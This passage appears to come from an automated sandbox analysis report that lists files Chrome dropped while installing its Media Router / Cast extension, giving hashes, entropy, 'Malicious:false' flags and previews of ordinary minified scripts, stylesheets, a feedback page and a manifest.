                                                                                                                                                                SHA-512:9269D79ADC15ADB645D7DF118726C59F5750BFA659DC9812A7E7D9EE7A15BA18AF4B417A865A95934237EA085983D30EF1AC2593EB4EF7D0DDA9FB531283E48D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\angular.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):609224
                                                                                                                                                                Entropy (8bit):5.410844677248803
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Uf6Dhzz3zA/hJNpwsswmlJp49tkhSZWZhPQM:PDhzD8/hJNhshlJp49tkhSZWZhPX
                                                                                                                                                                MD5:F1E52B350B1C324FF28EE4BCAD9FE22C
                                                                                                                                                                SHA1:AF775BA51D0607D3E2AD91CCBA1CB005DBA4669A
                                                                                                                                                                SHA-256:91744C4866BCE1BC77D3DF4D649DC7A0033EB4199D6A955ABA37C35DB570B93F
                                                                                                                                                                SHA-512:C22718D20198C79A233E9EAEA516DB70148D057B00DC50658F5433D5E2272975000D4ED7725BB7D068B31254EE73E696241914C1DF5AA34DF514110EBD6F7005
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: //third_party/javascript/angular/v1_6/angular.min.js./*. AngularJS v1.6.4-local+sha.617b36117. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.'use strict';(function(ia){'use strict';function Rf(a){if(fa(a))R(a.objectMaxDepth)&&(de.objectMaxDepth=fd(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return de}function fd(a){return Pa(a)&&0<a}function va(a){return function(){var b=arguments[0];var d="["+(a?a+":":"")+b+"] http://errors.angularjs.org/1.6.4-local+sha.617b36117/"+(a?a+"/":"")+b;for(b=1;b<arguments.length;b++){d=d+(1==b?"?":"&")+"p"+(b-1)+"=";var c=encodeURIComponent;var e=arguments[b];e="function"==typeof e?e.toString().replace(/ \{[\s\S]*$/,""):."undefined"==typeof e?"undefined":"string"!=typeof e?JSON.stringify(e):e;d+=c(e)}return Error(d)}}function ub(a){if(null==a||ac(a))return!1;if(oa(a)||na(a)||da&&a instanceof da)return!0;var b="length"in Object(a)&&a.length;return Pa(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function I(a,b,d){
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\background_script.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2078
                                                                                                                                                                Entropy (8bit):5.171252146309821
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Z8vQaPi3U7en+enInMtQgQ+AlRRZGztGsI5OuYHLEtX+Qf1h:Z8vtime+eokD9GS2OfL8X+QT
                                                                                                                                                                MD5:6D5A8D09DD0DB2E9250D3D972BE7A816
                                                                                                                                                                SHA1:BF726E35085F750EA3EBD4BC5F64EE225C85B228
                                                                                                                                                                SHA-256:B4C0290948F887A978D2183BC7F959D1C522D3F752285A3547B57CBFC1023C28
                                                                                                                                                                SHA-512:512E1C406AF4F958371167520D5C5257AF4737E6DAB6EB29E17B37D2D013DF398616AE08DC786F257CBF9042FAFA7E078A28387CBA443DE017FB40E4786E4B00
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';fb("mr.TestProvider");var wx,dw,xx=fb("mr.Init"),Oaa=function(a){void 0!==a.use_views_dialog&&xx.info("Using the "+(a.use_views_dialog?"Views (Harmony)":"WebUI")+" dialog.");void 0!==a.enable_cast_sink_query&&xx.info("Native Cast MRP is "+(a.enable_cast_sink_query?"disabled":"enabled")+".");void 0!==a.use_mirroring_service&&xx.info("Native Mirroring Service is "+(a.use_mirroring_service?"enabled":"disabled")+".")};qs().init();wx=new Fb("MediaRouter.Provider.WakeDuration");dw=new qw;.var Paa=(new Promise(function(a,b){switch(window.location.host){case "enhhojjnijigcajfphajepfemndkmdlo":a();break;case "pkedcjkdefgpdelpbcmbmeomcjbeemfm":chrome.management.get("enhhojjnijigcajfphajepfemndkmdlo",function(c){chrome.runtime.lastError||!c.enabled?a():b(Error("Dev extension is enabled"))});break;default:b(Error("Unknown extension id"))}})).then(function(){return chrome.mojoPrivate&&chrome.mojoPrivate.requireAsync?new Promise(function(a){chrome.mojoPrivate.requireAsync("media_router_
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\cast_sender.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):49641
                                                                                                                                                                Entropy (8bit):5.3010524124405975
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:PYrOR1tFkgKVM6bCHt0y7lkB2FJaFTS98eq9LcRdkpi4ryHSBKqppEmarFO2wYy0:PYrOR8Fl6kB2FJqTS98eq9LcRdkpi4rG
                                                                                                                                                                MD5:C9118D2AAF192FA3D4591DF130818BC1
                                                                                                                                                                SHA1:8411614105F9DF0F515CBE930744A3B60865CB44
                                                                                                                                                                SHA-256:9B2378860D76167F1F2D3515A83F13B24069109EE248DD8F8A0ED83673A930FB
                                                                                                                                                                SHA-512:F3F350D629FA95D5937BCA72CA04090B3D161C03636301A0CAE36298ED1721B1AA0D7989B9F29B07C613A784640F9631B3921CF93D56117D3AF5ED550AF7E65D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}},ca="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},g;.if("function"==typeof Object.setPrototypeOf)g=Object.setPrototypeOf;else{var m;a:{var da={a:!0},ea={};try{ea.__proto__=da;m=ea.a;break a}catch(a){}m=!1}g=m?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var fa=g,n=function(a,b){a.prototype=ca(b.prototype);a.prototype.constructor=a;if(fa)fa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.Jc=b.prototype},p=this||self,ha=function(){},ia
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\common.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40514
                                                                                                                                                                Entropy (8bit):5.430309801672184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:Ho+9YrfzFM2xfuNWEIX8MrjugAItDNOSsrLIXCxs/y0D:1YrrFLx6WEIX8CyBwNODw2s/yq
                                                                                                                                                                MD5:6B86C8D9D642840072947E7CEA4D6B6F
                                                                                                                                                                SHA1:152D0B70449F5FBD8159B2980D6DE8C0952070F0
                                                                                                                                                                SHA-256:21855FC22C9676242E1ECFAA9E609ED70D136E30BC3F297EFAD5702749FD264D
                                                                                                                                                                SHA-512:38C66349C9E51963D7D7DFFB9C2C66459BFAE2D4BCB0CA04178E25C30E6FED69F4D8277BFED2606144DBB0215938E0F7C4555196B90E08019AFBB8894974DD88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),fa=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.fa("Symbol",function(a){if(a)return a;var b=function(e,f){this.g=e;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=functi
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3116
                                                                                                                                                                Entropy (8bit):5.0201551881561635
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:31YB10fXdq14jTAu0mgs0gwa8J8LZmY1181Y5OGib210bGjKL1rT1hJ14DKtKUHo:nfX8udgaw7mL55cSuoKtHHxOA/x0n
                                                                                                                                                                MD5:D8EE20737329319BFA1ACBB0E6C219A6
                                                                                                                                                                SHA1:D24118D81990E1316CA809669ECB603724C6E7E2
                                                                                                                                                                SHA-256:A582FC20DBCAD1918000B690EB8F237EC14E5B836FD7F799C35702D88DBE6862
                                                                                                                                                                SHA-512:7633682BF161EB1EDE7D62AA9C5E65A727C030DBAA483FEC4F5948C5A5849EFA342A52260097358BF4EF02F07D0464C3356152ABBE4A5C534580960D80594AC9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: :root {. --paper-blue-500: rgb(33, 150, 243);. --paper-blue-500-dark: rgba(33, 150, 243, 0.87);. --paper-blue-500-light: rgba(33, 150, 243, 0.26);.};..body {. font-size: 12px;. height: inherit;.}..#description,.#required-legend {. margin-top: 22px;.}..#description,.#form-buttons,.#required-legend,.#title {. padding: 0 17px;.}...informative {. font-size: 13px;. line-height: 13px;.}..#feedback-confirmation {. width: initial;.}..#feedback-fine-log-warning {. color: rgb(219, 68, 55);. margin: 10px 0;.}..#feedback-type-toggle,..question {. padding: 16px 17px;.}..#form {. -webkit-padding-end: 24px;. -webkit-padding-start: 24px;. background-color: white;. color: rgba(0, 0, 0, 0.87);. box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);. margin: -100px auto 48px auto;. padding: 34px 17px;. width: 720px;. z-index: 1;.}..#form-buttons {. flex-direction: row;. display: flex;. justify-content: flex-end;. margin-top: 34px;.}..#header {. margin-bottom: 22px;.}..#header-banner {.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback.html
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15606
                                                                                                                                                                Entropy (8bit):4.340710080778977
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WGEiiDKFK5N+bVfifi5sdUemfOHT5MGTGhCBo5NmsAOZ0RsAOZYu24kJkcdFXOrO:WGESFKrsitdfGO6nrom6mcCswz4TLn
                                                                                                                                                                MD5:0EFADA4B2A95CC2D4AE00F794759D763
                                                                                                                                                                SHA1:FEC3BB7837BE805955601F8C211DC5BE1F16535D
                                                                                                                                                                SHA-256:8CB99506A2ED9BCC6E1A66E0F218524C91304B3EBFCA113D0FECBB3D80078D0D
                                                                                                                                                                SHA-512:7ADF9EA446F06C5BFB203CAE8E0CB97E230E7230D9EC7BEAB8B7F76AC8E9B9CF0FC7395C87D90836D7FDCA57E8F80FD9E0091807B3F902A37F67C69144E49616
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: <!DOCTYPE html>.<html ng-app="feedbackApp" ng-controller="FeedbackCtrl". ng-csp xmlns="http://www.w3.org/1999/xhtml" lang="top.language">.<head>. <title>. Chrome Media Router feedback. </title>. <link rel="stylesheet" type="text/css" href="feedback.css">. <link rel="stylesheet" type="text/css" href="material_css_min.css">. <script src="angular.js"></script>. <script type="text/javascript" src="common.js"></script>. <script type="text/javascript" src="feedback_script.js"></script>.</head>.<body>. <div id="header-banner"></div>. <div>. <div id="form">. <div id="header">. <div id="title">. <angular-message key="MEDIA_ROUTER_FEEDBACK_HEADER". desc="Header of the Media Router feedback page.">. Tell us what's happening with Google Cast.. </angular-message>. </div>. <div id="description" class="informative">. <angular-message key="MEDIA_ROUTER_FEEDBACK_FORM_DESCRIPTION". desc="Text to d
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback_script.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):25282
                                                                                                                                                                Entropy (8bit):5.753244978977296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:mVHpCozN1nyJ0kCFmgOC9ARzNohHunY4Fjw7sCyyXFvT010CJau6LKwqwW1cGLC:mVHpCozN1nyJ0kCFmgOC9ARzNohHunYx
                                                                                                                                                                MD5:F0254686411ED475F25E7CADF2C43C00
                                                                                                                                                                SHA1:553AA52F7C4E3CE4A046545AB6829B1C97227540
                                                                                                                                                                SHA-256:574F96B5295A809AABE848F7DB1661595A0CBEC580D83EA78CC786379AF7886F
                                                                                                                                                                SHA-512:5F1474439923B79E563F2D3FB9B1B4448BBB5DC702C26A7C118F430B6F5583ABC9611BB1B96BA230A2BDC9ED440A25700454D80F803501DCA37771513E7EE60A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var hh=function(a,b,c){a.timeOfStartCall=(new Date).getTime();var d=c||Ia,e=d.document,f=a.nonce||Ue(d);f&&!a.nonce&&(a.nonce=f);if("help"==a.flow){var g=Ja("document.location.href",d);!a.helpCenterContext&&g&&(a.helpCenterContext=g.substring(0,1200));g=!0;if(b&&JSON&&JSON.stringify){var h=JSON.stringify(b);(g=1200>=h.length)&&(a.psdJson=h)}g||(b={invalidPsd:!0})}b=[a,b,c];d.GOOGLE_FEEDBACK_START_ARGUMENTS=b;c=a.serverUri||"//www.google.com/tools/feedback";if(g=d.GOOGLE_FEEDBACK_START)g.apply(d,b);.else{d=c+"/load.js?";for(var m in a)b=a[m],null==b||Oa(b)||(d+=encodeURIComponent(m)+"="+encodeURIComponent(b)+"&");a=dg(Uf(e),"SCRIPT");f&&a.setAttribute("nonce",f);Ve(a,fg(d));e.body.appendChild(a)}};v("userfeedback.api.startFeedback",hh);var ih=function(){this.j=this.h=this.u=this.modelName=this.l=this.g=this.dd="";this.C=this.o=this.m=!1};var jh=chrome.i18n.getMessage("4163185390680253103"),kh=chrome.i18n.getMessage("492097680647953484"),lh=chrome.i18n.getMessage("2575016469
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2092
                                                                                                                                                                Entropy (8bit):5.317090883496623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:QWaLGou01gC7CsbCypwQdmv7pej3hE/ao16JN8A3:DaLUgCWrdmTpDAN5
                                                                                                                                                                MD5:48A1759AE81A93444171ADAB438B247D
                                                                                                                                                                SHA1:362D1AC81C289CFE1C59F88CD7DF8C32B5C693E9
                                                                                                                                                                SHA-256:555A8069571CB8D82286CBFF6B9BE23B6EB49ACACBC5E7217DAECAD23D9DD570
                                                                                                                                                                SHA-512:C3402BAA4A6822CE78E234556F62CCC819321A22B37555BE10B74BDE2FC6ADC7C7C2C3F02AF92760C1A3BC64D4921FB7986A84481C68C40281F0779A2D183C6F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "background": {.. "persistent": false,.. "scripts": [ "common.js", "mirroring_common.js", "background_script.js" ].. },.. "content_security_policy": "default-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; script-src 'self' https://apis.google.com https://feedback.googleusercontent.com https://www.google.com https://www.gstatic.com; child-src https://accounts.google.com https://content.googleapis.com https://www.google.com; connect-src 'self' http://*:* https://*:*; font-src https://fonts.gstatic.com;",.. "default_locale": "en",.. "description": "Provider for discovery and services for mirroring of Chrome Media Router",.. "externally_connectable": {.. "ids": [ "idmofbkcelhplfjnmmdolenpigiiiecc", "ggedfkijiiammpnbdadhllnehapomdge", "njjegkblellcjnakomndbaloifhcoccg" ].. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNTWJoPZ9bT32yKxuuVa9LSEYobjPoXCLX3dgsZ9djDrWKNikTECjdRe3/AFXb+v8jkmmtYQPnOgSYn06J/QodDlCIG6l470+gkOoobUM7f
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\material_css_min.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):322554
                                                                                                                                                                Entropy (8bit):5.071302554556422
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:5UhKq5pbUqJHPPXLdi6cv+lWUgkgRyrG24CszGR+QAQ4Vy3OSYec3eNk3ksSn+8o:52TFa
                                                                                                                                                                MD5:76EAA4368ED0E83F45B725727414D0E2
                                                                                                                                                                SHA1:CB3ABE758DD77E0AC48F9C9D23DB386E9E52E42E
                                                                                                                                                                SHA-256:3F94B4F2DDAE805F4863FE751B138CB77B24893E3EDE6822E72F0EE4624CD155
                                                                                                                                                                SHA-512:8835E1B06718C86D8AB690E700AAF61E47B8E3F6E64D943EC7D95CDB293499F47D5CE408440E0D636A62D580781D256C204CC3E10735D27E49B53A236A6A19B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*!. * AngularJS Material Design. * https://github.com/angular/material. * @license MIT. * v1.1.20. */body,html{height:100%;position:relative}body{margin:0;padding:0}[tabindex="-1"]:focus{outline:none}.inset{padding:10px}a.md-no-style,button.md-no-style{font-weight:400;background-color:inherit;text-align:left;border:none;padding:0;margin:0}button,input,select,textarea{vertical-align:baseline}button,html input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[type=button][disabled],input[type=reset][disabled],input[type=submit][disabled]{cursor:default}textarea{vertical-align:top;overflow:auto}input[type=search]{-webkit-appearance:textfield;box-sizing:content-box;-webkit-box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}input:-webkit-autofill{text-shadow:none}.md-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_cast_streaming.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36444
                                                                                                                                                                Entropy (8bit):5.305050936612732
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:zkatHT5iMVc2g2ga19kE/ZFqJeZm1CXaaFSYpXIKzidevGNIjAO8KxKI5kWiSl+o:H/xF1EW7DzVvjAO89SNO6VXG04E
                                                                                                                                                                MD5:63F087BB1FA9F4641C327B3B6973E439
                                                                                                                                                                SHA1:7115D9E0EEE14C336EF3D8B272675B6AFC39E45F
                                                                                                                                                                SHA-256:66E9A229F7E9E470B2421F0E1C218159AD51864CDD3C77997A6ECFEB6881B541
                                                                                                                                                                SHA-512:99694BE658E0D00A4BDECC45899C9DDA12295ABD38EBCD59569D5CBFBB97A41624FBB7FBD828863AAF06ED9449D10705917A3F175B4F359E9103BE0FE3A06284
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var Qaa={TAB:0,ln:1,jv:2},yx=function(){return new Bb("MediaRouter.CastStreaming.Session.Launch")},zx=function(){return new Hb("MediaRouter.CastStreaming.Session.Length")},Ax=function(a){Mb("MediaRouter.CastStreaming.Start.Success",a,Qaa)};var Bx=fb("mr.mirror.cast.LogUploader");function Cx(a,b,c){Dx("raw_events.log.gz",a,b,c);return b?"https://crash.corp.google.com/samples?reportid=&q="+encodeURIComponent("UserComments='"+b+"'"):""}.function Dx(a,b,c,d){if(0==b.size)Bx.info("Trying to upload an empty file to Crash"),d&&d(null);else{var e=new FormData;e.append("prod","Cast");e.append("ver",chrome.runtime.getManifest().version);e.append(a,b);c&&e.append("comments",c);kx("https://clients2.google.com/cr/report",function(f){f=f.target;var g=null;sx(f)?(g=ux(f),Bx.info("Upload to Crash succeeded: "+g)):Bx.info("Upload to Crash failed. HTTP status: "+f.za());d&&d(g)},"POST",e,void 0,3E4)}};var Ex=function(){this.g=0;Tm(this)},Gx=function(){Fx||(Fx=new Ex);return Fx},Raa=function
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_common.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):207556
                                                                                                                                                                Entropy (8bit):5.432854181645903
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:NxPjVMju5MLRdxCq11R3D0dK3qorEvw5MqJxM1qLFHNfBclvu45DM7UFuUmmfcCD:N5jVKu5MLRdxCq11R3D0dK3qorEvw5Ml
                                                                                                                                                                MD5:C642C9F61A3E11BDC31609BDB5420414
                                                                                                                                                                SHA1:9F4E2DC4487195B849A4898EE4962D6C54002AB5
                                                                                                                                                                SHA-256:92C610102B7172C80596F32D952D40C9379F8EDDA475A3896E8BE5DCA414A34B
                                                                                                                                                                SHA-512:8E910E71D20353D427B3E0901D90BDC72A05950F1D6AD0C2A569E76C0462B1941BAF28FD87BE95D9570E1B4558BCE090CB4B80D1B8635990781A2DF36AEF576F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var sj;var tj=chrome.i18n.getMessage("545449835455981095");v("mr.IssueSeverity",{MH:"fatal",bT:"warning",dM:"notification"});v("mr.IssueAction",{zH:"dismiss",pK:"learn_more"});var uj=function(a,b){this.sinkId=this.routeId=null;this.severity=b;this.isBlocking="fatal"==this.severity?!0:!1;this.title=a;this.message=null;this.defaultAction="dismiss";this.helpPageId=this.secondaryActions=null},wj=function(){var a=new uj(vj,"notification");a.helpPageId=6320939;a.defaultAction="learn_more";a.secondaryActions=["dismiss"];return a},xj=function(a,b){a.sinkId=b;return a};var yj=function(a,b){var c=this;this.g=void 0===b?null:b;this.promise=new Promise(function(d,e){var f=function(g){c.g=null;e(g)};c.h=f;a(function(g){c.g=null;d(g)},f)})};yj.prototype.cancel=function(a){this.h(a);if(this.g){var b=this.g;this.g=null;setTimeout(function(){return b(a)},0)}};var zj=function(a,b,c){c=void 0===c?null:c;return new yj(function(d,e){a.promise.then(function(f){if(b)try{d(b(f))}catch(g){e(g)}els
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_hangouts.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):833635
                                                                                                                                                                Entropy (8bit):5.545662863836174
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:abcq20T9PVeWqHk1IHqPCznEui5vGQZg0JTztsV1VD:JqNT9PVeWkqPqEuUvGQZg0JTztsV1VD
                                                                                                                                                                MD5:D337E291B4377F8732F455CA32F89374
                                                                                                                                                                SHA1:3E25996EF17ABFF950AD146EFFBE1EDCE128AFF6
                                                                                                                                                                SHA-256:AEA84BB4D3C96D80B3F241A9AAFC7EDE5062BF809792FC4984E5571CA6FD217C
                                                                                                                                                                SHA-512:1AD47E406750933135B88FCD8CFBF004FE164862CF431C3E06515C4C16D7BD63E4E739F37033F3A3CEB0405F669B96CE6D539A732B7280692B718878DA437BD3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var ty=function(a,b,c,d){this.g=a;this.j=b;this.Dd=c;this.l=d};ty.prototype.h=function(){return!!this.Dd};var uy=function(a,b,c){var d=Wk.prototype.h,e=ml.prototype.C;this.j=a;this.g=d;this.h=e;this.m=b;this.l=c};var vy=function(a){K(this,a,0,1,null,null)};r(vy,J);var Kba=function(a,b){Ll(a,b,wy)},Lba=function(a,b){for(;x(b);){var c=a,d=b,e=wy;if(1==d.j&&3==d.m){for(var f=0,g=null;x(d)&&(0!=d.m||0!=d.j);)if(0==d.m&&2==d.j)f=Zk(d);else if(2==d.m&&3==d.j)g=$k(d);else if(4==d.m)break;else z(d);if(1!=d.j||4!=d.m||null==g||0==f)throw Error("Malformed binary bytes for message set");if(d=e[f])e=d.j,f=new e.Dd,d.l.call(f,f,new Wk(g)),Nl(c,e,f)}else z(d)}return a},xy={},wy={};var yy=function(a){K(this,a,0,-1,null,null)};r(yy,J);var Pba=function(a,b){for(;x(b)&&!w(b);)switch(b.j){case 1:var c=new zy;b.h(c,Mba);R(a,1,c);break;case 2:c=new Ay;b.h(c,By);R(a,2,c);break;case 3:c=new Ay;b.h(c,By);R(a,3,c);break;case 4:c=new Cy;b.h(c,Nba);R(a,4,c);break;case 5:c=new Dy;b.h(c,Oba);R(a,5,c);
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_webrtc.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2350
                                                                                                                                                                Entropy (8bit):5.295379939015016
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:oNowvRbtlRW3oSk7t1uEFGVz4eEXMeM2GqxyLO0Q1ddpO:elJb9W3bfEFGjg02NYO/dpO
                                                                                                                                                                MD5:9CE032F9C2FE79EB62746CE0DDE8C5E0
                                                                                                                                                                SHA1:7CBCB07EF6582F42960BFF3D88A6D7C1F4501F59
                                                                                                                                                                SHA-256:FDA1A84D5F216D6ED78055067B1C09D51499B8506AA425FBDE6694B19AF34D06
                                                                                                                                                                SHA-512:12D14435D170712895FB626A28360DFA2BA72737D967A06F6186F650EA8B85E9ADB2AB08CA980C4CB20A8BFB51538595326288C2B142EFED07CBA1DAD7716217
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var LLa={TAB:0,ln:1,jv:2},Y$=function(a){Mb("MediaRouter.WebRtc.Start.Success",a,LLa)};var Z$=function(a,b){Ak.call(this,b);this.G=a;this.l=new qb;this.g=nw(b.id);this.m=new qb;this.D=!1;this.o=null;this.F=!1;this.u=this.C=null;MLa(this);NLa(this);this.g.sendMessage(new Ps("GET_TURN_CREDENTIALS"))};r(Z$,Ak);.Z$.prototype.start=function(a){var b=this;return this.l.promise.then(function(c){if(c.g)return Promise.reject(new Fj("Mirroring already started"));if(b.o)return Promise.reject(new Fj("Session permanently stopped"));b.C=new Bb("MediaRouter.WebRtc.Session.Launch");c.ea.addStream(a);c.start();return b.m.promise})};.Z$.prototype.stop=function(){var a=this;this.m.reject(new Fj("Session stop requested."));this.u&&(this.u.end(),this.u=null);if(this.o)return this.o;this.F=this.D=!1;this.C=null;return this.o=this.l.promise.then(function(b){b.stop()}).then(function(){return a.g.dispose()}).catch(function(b){a.g.dispose();throw b;})};.var MLa=function(a){a.g.onMessage=function(b)
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\7f4122a7-f299-4e97-ac86-0a64ab2e897c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):248531
                                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
